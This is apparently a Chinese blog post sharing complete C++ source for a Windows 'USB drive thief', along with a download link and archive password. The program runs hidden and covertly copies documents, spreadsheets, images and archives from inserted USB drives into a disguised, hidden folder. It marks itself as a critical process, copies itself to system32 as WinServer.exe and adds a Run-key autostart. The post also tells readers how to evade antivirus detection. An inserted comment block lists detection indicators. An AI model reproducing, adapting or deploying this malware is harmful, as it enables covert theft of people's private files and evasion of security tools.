不多说,直接上代码,貌似现在流行代码即文档,就不做说明了
注:
这程序360报毒,云引擎报HEUR/Malware.QVM10.Gen,要解决的话,可以把写注册表给删了,把复制自身到C盘给干掉,就不会报毒了
在 http://www.virscan.org/ 上扫描时只有AVG报毒,其余引擎均不报毒
下载地址:http://www.lanyus.com/wordpress/wp-content/uploads/2013/03/USB.rar
解压密码:www.lanyus.com
/**
 Copyright (C) 2013, 无心问世工作室
 Program name: U盘小偷 ("USB drive thief")
 Author: 无心问世
 Version: v1.0
 Date: 2013/3/15
 Description: copies documents and similar files from USB drives, you know what for
 This program may be freely modified and distributed, provided the author's copyright notice is kept
**/
// Analyst summary (everything below is read directly from this listing):
//  - Runs as a hidden-window Win32 process and reacts to WM_DEVICECHANGE /
//    DBT_DEVICEARRIVAL for volumes.
//  - For each removable drive, copies files whose path ends in one of a fixed set of
//    three-character suffixes into a per-volume folder under `to_dst`.
//  - Host artefacts useful for detection and triage:
//      mutex            "USBSPY_is_Running"
//      window class     "usb" (window is never shown)
//      self-copy        C:\WINDOWS\system32\WinServer.exe
//      autorun          HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value "WinServer"
//      staging root     D:\Program Files\Tencent\QQ\Bin\Import\<volume serial, decimal>\
//      log files        ImFileChange.txt, FileChange.txt, <volume serial>.txt (dir listing)
//      skip marker      a file named XF5201314 in the root of the removable drive
//      child processes  "cmd /c dir|attrib|echo|mkdir ..." started with SW_HIDE
//  - Adjusts a privilege and sets a process-information class through ntdll exports
//    resolved at run time (see WinMain).
#include <windows.h>
#include <string>
#include <stdio.h>
#include <Dbt.h>
#include <iostream>
#include "io.h"
#include "tlhelp32.h"
#include "stdio.h"
#include <tchar.h>
#include <conio.h>
#include <fstream>
using namespace std;

// Handle of the single-instance mutex created in WinMain.
HANDLE hOneInstanceMutex;
// Staging root for copied files; the path resembles a Tencent QQ install directory.
char to_dst[10000] = "D:\\Program Files\\Tencent\\QQ\\Bin\\Import\\";

// Signatures for the two ntdll exports that WinMain resolves with GetProcAddress.
typedef ULONG(__stdcall*PRtlAdjustPrivilege)(ULONG Privilege,int Enable,int CurrentThread,int*Enabled);
typedef ULONG(__stdcall*PNtSetInformationProcess)(HANDLE ProcessHandle,ULONG InformationClass,void*Information,ULONG Length);

int Getdisknumber(LPCTSTR lpRootPathName);
void ImDir(char *lpPath,char *dst_dir,char *dst_list_dir);
void Dir(char *lpPath,char *dst_dir,char *dst_list_dir);
LRESULT CALLBACK WndProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam);
int AutoStartSystem(char *keyname,TCHAR lpFilename[MAX_PATH]);
int Safe();

// Entry point: adjusts process state via ntdll, enforces a single instance, creates a
// hidden window and pumps messages so WndProc receives device-arrival notifications.
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    HMODULE ntdll;
    int b;
    PRtlAdjustPrivilege pRtlAdjustPrivilege;
    PNtSetInformationProcess pNtSetInformationProcess;
    // Both exports are resolved dynamically; the returned pointers are used without a
    // NULL check.
    ntdll=GetModuleHandleW(L"ntdll.dll");
    pRtlAdjustPrivilege=(PRtlAdjustPrivilege)GetProcAddress(ntdll,"RtlAdjustPrivilege");
    pNtSetInformationProcess=(PNtSetInformationProcess)GetProcAddress(ntdll,"NtSetInformationProcess");
    // Privilege value 20 is SeDebugPrivilege. Information class 0x1d with a value of 1
    // is ProcessBreakOnTermination, i.e. the process is flagged as critical; the same
    // call with 0 on the exit paths below clears the flag again.
    // (HANDLE)-1 is the current-process pseudo handle.
    pRtlAdjustPrivilege(20,1,0,&b);
    b=1;
    pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b);
    // Single-instance guard: a second copy sees ERROR_ALREADY_EXISTS and exits.
    hOneInstanceMutex = NULL;
    hOneInstanceMutex = ::CreateMutex(NULL, FALSE, _T("USBSPY_is_Running"));
    if(GetLastError() == ERROR_ALREADY_EXISTS)
    {
        hOneInstanceMutex = NULL;
        b=0;
        pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b);
        return 0;
    }
    // Window class "usb" exists only to receive broadcast messages; the window is
    // created and then hidden with SW_HIDE.
    WNDCLASS wndclass;
    wndclass.cbClsExtra=0;
    wndclass.cbWndExtra=0;
    wndclass.hbrBackground=(HBRUSH)GetStockObject(BLACK_BRUSH);
    wndclass.hCursor=LoadCursor(NULL,IDC_ICON);
    wndclass.hIcon=LoadIcon(NULL,IDI_ASTERISK);
    wndclass.hInstance=hInstance;
    wndclass.lpfnWndProc=WndProc;
    wndclass.lpszClassName="usb";
    wndclass.lpszMenuName=NULL;
    wndclass.style=CS_VREDRAW|CS_HREDRAW;
    RegisterClass(&wndclass);
    HWND hwnd;
    hwnd=CreateWindow("usb","",WS_OVERLAPPEDWINDOW,150,150,683,384,NULL,NULL,hInstance,NULL);
    ShowWindow(hwnd,SW_HIDE);
    UpdateWindow(hwnd);
    MSG msg;
    while(GetMessage(&msg,hwnd,0,0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
        // Safe() runs after every dispatched message, so the self-copy and the Run
        // value are re-attempted continuously while the process is alive.
        Safe();
    }
    b=0;
    pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b);
    return 0;
}

// Window procedure of the hidden window. WM_CLOSE and WM_DESTROY return without
// calling DefWindowProc; WM_CREATE calls Safe(); WM_DEVICECHANGE drives the copying.
LRESULT CALLBACK WndProc( HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
    switch(uMsg)
    {
    case WM_PAINT:
        {
            PAINTSTRUCT ps;
            BeginPaint(hwnd,&ps);
            EndPaint(hwnd,&ps);
            break;
        }
    case WM_CLOSE:
        {
            // Close requests are swallowed here.
            return FALSE;
            break;
        }
    case WM_DESTROY:
        {
            return FALSE;
            break;
        }
    case WM_CREATE:
        {
            Safe();
            break;
        }
    case WM_DEVICECHANGE:
        {
            if(lParam!=0)
            {
                PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
                if(lpdb->dbch_devicetype==DBT_DEVTYP_VOLUME)
                {
                    if(wParam==DBT_DEVICEARRIVAL)
                    {
                        long i,j;
                        TCHAR buf[100];
                        TCHAR *cdbuf;
                        j=100;
                        i=GetLogicalDriveStrings(j,buf);
                        // The loop advances one character at a time, so GetDriveType
                        // is called at every offset of the drive-string buffer, not
                        // only at the start of each drive root.
                        for(j=0;j<i;j++)
                        {
                            cdbuf=&buf[j];
                            if(GetDriveType(cdbuf)==DRIVE_REMOVABLE)
                            {
                                // Per-volume staging folder: to_dst + decimal volume
                                // serial number. set_hid_dir keeps the path without
                                // the trailing backslash.
                                char disk_number[260];
                                sprintf(disk_number,"%d",Getdisknumber(cdbuf));
                                char to_dst_dir[260];
                                char set_hid_dir[260];
                                strcpy(to_dst_dir,to_dst);
                                strcat(to_dst_dir,disk_number);
                                strcpy(set_hid_dir,to_dst_dir);
                                strcat(to_dst_dir,"\\");
                                // Drives that carry a file named XF5201314 in their
                                // root are skipped entirely.
                                char imdstfile[200];
                                strcpy(imdstfile,cdbuf);
                                strcat(imdstfile,"XF5201314");
                                fstream _file;
                                _file.open(imdstfile,ios::in);
                                if(_file)
                                {
                                    continue;
                                }
                                CreateDirectory(to_dst_dir,NULL);
                                // Two passes over the drive, one per suffix list.
                                ImDir(cdbuf,to_dst_dir,to_dst_dir);
                                Dir(cdbuf,to_dst_dir,to_dst_dir);
                                // Recursive directory listing of the drive, written
                                // to <staging root>\<serial>.txt by a hidden cmd.exe.
                                char cmdline[260];
                                strcpy(cmdline,"cmd /c dir \"");
                                strcat(cmdline,cdbuf);
                                strcat(cmdline,"\" /S /O:-D /T:W /N > \"");
                                strcat(cmdline,set_hid_dir);
                                strcat(cmdline,".txt\"");
                                WinExec(cmdline,SW_HIDE);
                                // Staging folder is marked read-only, system, hidden.
                                char cmdstrend[260];
                                strcpy(cmdstrend,"cmd /c attrib +R +S +H \"");
                                strcat(cmdstrend,set_hid_dir);
                                strcat(cmdstrend,"\"");
                                WinExec(cmdstrend,SW_HIDE);
                                // A separator line is appended to both log files
                                // after each drive has been processed.
                                char cmdstrimdir[260];
                                strcpy(cmdstrimdir,"cmd /c echo \"--------------------------------\" >> \"");
                                strcat(cmdstrimdir,to_dst_dir);
                                strcat(cmdstrimdir,"ImFileChange.txt\"");
                                WinExec(cmdstrimdir,SW_HIDE);
                                char cmdstrimdir2[260];
                                strcpy(cmdstrimdir2,"cmd /c echo \"--------------------------------\" >> \"");
                                strcat(cmdstrimdir2,to_dst_dir);
                                strcat(cmdstrimdir2,"FileChange.txt\"");
                                WinExec(cmdstrimdir2,SW_HIDE);
                            }
                        }
                    }
                }
            }
            break;
        }
    default:
        {
            return DefWindowProc(hwnd,uMsg,wParam,lParam);
            break;
        }
    }
    return 0;
}

// Persistence: writes `lpFilename`, wrapped in double quotes, as REG_SZ value `keyname`
// under HKLM\Software\Microsoft\Windows\CurrentVersion\Run. The byte count passed is
// sizeof(Path), i.e. the whole MAX_PATH buffer rather than the string length, and the
// result of RegOpenKey is not checked before the handle is used. Always returns 0.
int AutoStartSystem(char *keyname,TCHAR lpFilename[MAX_PATH])
{
    HKEY hkResult;
    TCHAR Path[MAX_PATH];
    strcpy(Path,"\"");
    strcat(Path,lpFilename);
    strcat(Path,"\"");
    LPCSTR regname="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);
    ret=RegSetValueEx(hkResult,keyname,0,REG_SZ,(unsigned char *)Path,sizeof(Path));
    RegCloseKey(hkResult);
    return 0;
}

// First copy pass. Recursively walks `lpPath`, mirrors each sub-directory under
// `dst_dir`, and copies files selected by the suffix test below. Every copied source
// path is appended to ImFileChange.txt in `dst_list_dir` through a hidden cmd.exe.
void ImDir(char *lpPath,char *dst_dir,char *dst_list_dir)
{
    char szFind[10000];
    strcpy(szFind,lpPath);
    strcat(szFind,"\\*.*");
    WIN32_FIND_DATA wfd;
    HANDLE hFind=FindFirstFile(szFind,&wfd);
    if (hFind == INVALID_HANDLE_VALUE)
    {
        FindClose(hFind);
        return;
    }
    else
    {
        do
        {
            // Skips every entry whose name starts with '.', which includes "." and "..".
            if (wfd.cFileName[0] == '.') continue;
            if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                // The directory is created on the destination side before recursing,
                // whether or not it ends up containing a matching file.
                char szFile[10000];
                char dir[10000];
                strcpy(szFile,lpPath);
                strcpy(dir,dst_dir);
                strcat(szFile,"\\");
                strcat(dir,"\\");
                strcat(szFile,wfd.cFileName);
                strcat(dir,wfd.cFileName);
                CreateDirectory(dir,NULL);
                ImDir(szFile,dir,dst_list_dir);
            }
            else
            {
                char szFile[10000];
                strcpy(szFile,lpPath);
                strcat(szFile,"\\");
                strcat(szFile,wfd.cFileName);
                // The test looks at the final three characters of the full path,
                // lower-cased in place; no '.' separator is required.
                int len=strlen(szFile);
                char *p=&szFile[len-3];
                strlwr(p);
                if(strcmp(p,"doc")==0||strcmp(p,"docx")==0)
                {
                    char dst_file[10000];
                    strcpy(dst_file,dst_dir);
                    strcat(dst_file,"\\");
                    strcat(dst_file,wfd.cFileName);
                    fstream _file;
                    _file.open(dst_file,ios::in);
                    if(!_file)
                    {
                        // Destination cannot be opened: first-time copy.
                        CopyFile(szFile,dst_file,true);
                        char cmdstrimdir1[260];
                        strcpy(cmdstrimdir1,"cmd /c echo \"");
                        strcat(cmdstrimdir1,szFile);
                        strcat(cmdstrimdir1,"\" >> \"");
                        strcat(cmdstrimdir1,dst_list_dir);
                        strcat(cmdstrimdir1,"ImFileChange.txt\"");
                        WinExec(cmdstrimdir1,SW_HIDE);
                    }
                    else
                    {
                        // Destination exists: overwrite only when the last-write
                        // times of source and stored copy differ.
                        WIN32_FIND_DATA dst;
                        HANDLE find_dst = FindFirstFile(dst_file,&dst);
                        LONG lRet = CompareFileTime(&wfd.ftLastWriteTime,&dst.ftLastWriteTime);
                        if (lRet != 0)
                        {
                            CopyFile(szFile,dst_file,false);
                            char cmdstrimdir2[260];
                            strcpy(cmdstrimdir2,"cmd /c echo \"");
                            strcat(cmdstrimdir2,szFile);
                            strcat(cmdstrimdir2,"\" >> \"");
                            strcat(cmdstrimdir2,dst_list_dir);
                            strcat(cmdstrimdir2,"ImFileChange.txt\"");
                            WinExec(cmdstrimdir2,SW_HIDE);
                        }
                        FindClose(find_dst);
                    }
                }
            }
        } while(FindNextFile(hFind, &wfd));
        FindClose(hFind);
    }
}

// Second copy pass. Same traversal and copy logic as ImDir, with a different suffix
// list (spreadsheets, text, images, archives) and FileChange.txt as the log file.
void Dir(char *lpPath,char *dst_dir,char *dst_list_dir)
{
    char szFind[10000];
    strcpy(szFind,lpPath);
    strcat(szFind,"\\*.*");
    WIN32_FIND_DATA wfd;
    HANDLE hFind=FindFirstFile(szFind,&wfd);
    if (hFind == INVALID_HANDLE_VALUE)
    {
        FindClose(hFind);
        return;
    }
    else
    {
        do
        {
            // Skips every entry whose name starts with '.', which includes "." and "..".
            if (wfd.cFileName[0] == '.') continue;
            if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                char szFile[10000];
                char dir[10000];
                strcpy(szFile,lpPath);
                strcpy(dir,dst_dir);
                strcat(szFile,"\\");
                strcat(dir,"\\");
                strcat(szFile,wfd.cFileName);
                strcat(dir,wfd.cFileName);
                CreateDirectory(dir,NULL);
                Dir(szFile,dir,dst_list_dir);
            }
            else
            {
                char szFile[10000];
                strcpy(szFile,lpPath);
                strcat(szFile,"\\");
                strcat(szFile,wfd.cFileName);
                // As in ImDir: final three characters of the full path, lower-cased
                // in place.
                int len=strlen(szFile);
                char *p=&szFile[len-3];
                strlwr(p);
                if(strcmp(p,"xls")==0||strcmp(p,"xlsx")==0||strcmp(p,"txt")==0||strcmp(p,"jpg")==0||strcmp(p,"png")==0||strcmp(p,"bmp")==0||strcmp(p,"rar")==0||strcmp(p,"zip")==0)
                {
                    char dst_file[10000];
                    strcpy(dst_file,dst_dir);
                    strcat(dst_file,"\\");
                    strcat(dst_file,wfd.cFileName);
                    fstream _file;
                    _file.open(dst_file,ios::in);
                    if(!_file)
                    {
                        // Destination cannot be opened: first-time copy.
                        CopyFile(szFile,dst_file,true);
                        char cmdstrimdir1[260];
                        strcpy(cmdstrimdir1,"cmd /c echo \"");
                        strcat(cmdstrimdir1,szFile);
                        strcat(cmdstrimdir1,"\" >> \"");
                        strcat(cmdstrimdir1,dst_list_dir);
                        strcat(cmdstrimdir1,"FileChange.txt\"");
                        WinExec(cmdstrimdir1,SW_HIDE);
                    }
                    else
                    {
                        // Destination exists: overwrite only when the last-write
                        // times of source and stored copy differ.
                        WIN32_FIND_DATA dst;
                        HANDLE find_dst = FindFirstFile(dst_file,&dst);
                        LONG lRet = CompareFileTime(&wfd.ftLastWriteTime,&dst.ftLastWriteTime);
                        if (lRet != 0)
                        {
                            CopyFile(szFile,dst_file,false);
                            char cmdstrimdir2[260];
                            strcpy(cmdstrimdir2,"cmd /c echo \"");
                            strcat(cmdstrimdir2,szFile);
                            strcat(cmdstrimdir2,"\" >> \"");
                            strcat(cmdstrimdir2,dst_list_dir);
                            strcat(cmdstrimdir2,"FileChange.txt\"");
                            WinExec(cmdstrimdir2,SW_HIDE);
                        }
                        FindClose(find_dst);
                    }
                }
            }
        } while(FindNextFile(hFind, &wfd));
        FindClose(hFind);
    }
}

// Returns the volume serial number of `lpRootPathName` as reported by
// GetVolumeInformation; the caller uses it as the per-drive folder name. The two
// buffers allocated with new[] are not released in this function, and the API's
// return value is not checked, so VolumeSerialNumber may be returned uninitialised.
int Getdisknumber(LPCTSTR lpRootPathName)
{
    LPTSTR lpVolumeNameBuffer=new char[12];
    DWORD nVolumeNameSize=12;
    DWORD VolumeSerialNumber;
    DWORD MaximumComponentLength;
    LPTSTR lpFileSystemNameBuffer=new char[10];
    DWORD nFileSystemNameSize=10;
    DWORD FileSystemFlags;
    ::GetVolumeInformation(lpRootPathName,lpVolumeNameBuffer,nVolumeNameSize,&VolumeSerialNumber,&MaximumComponentLength, &FileSystemFlags,lpFileSystemNameBuffer,nFileSystemNameSize);
    return VolumeSerialNumber;
}

// Install routine, called on WM_CREATE and after every dispatched message. Creates the
// staging root with a hidden "cmd /c mkdir", copies the running executable to
// C:\WINDOWS\system32\WinServer.exe (CopyFile with TRUE, so an existing file is not
// overwritten) and registers that path under the Run key as "WinServer".
// Always returns 1.
int Safe()
{
    char cmdmkdir[260];
    strcpy(cmdmkdir,"cmd /c mkdir \"");
    strcat(cmdmkdir,to_dst);
    strcat(cmdmkdir,"\"");
    WinExec(cmdmkdir,SW_HIDE);
    TCHAR ExeFullPath[MAX_PATH];
    GetModuleFileName(NULL,ExeFullPath,MAX_PATH);
    TCHAR NewFilePath[MAX_PATH]="C:\\WINDOWS\\system32\\WinServer.exe";
    CopyFile(ExeFullPath,NewFilePath,TRUE);
    AutoStartSystem("WinServer",NewFilePath);
    return 1;
}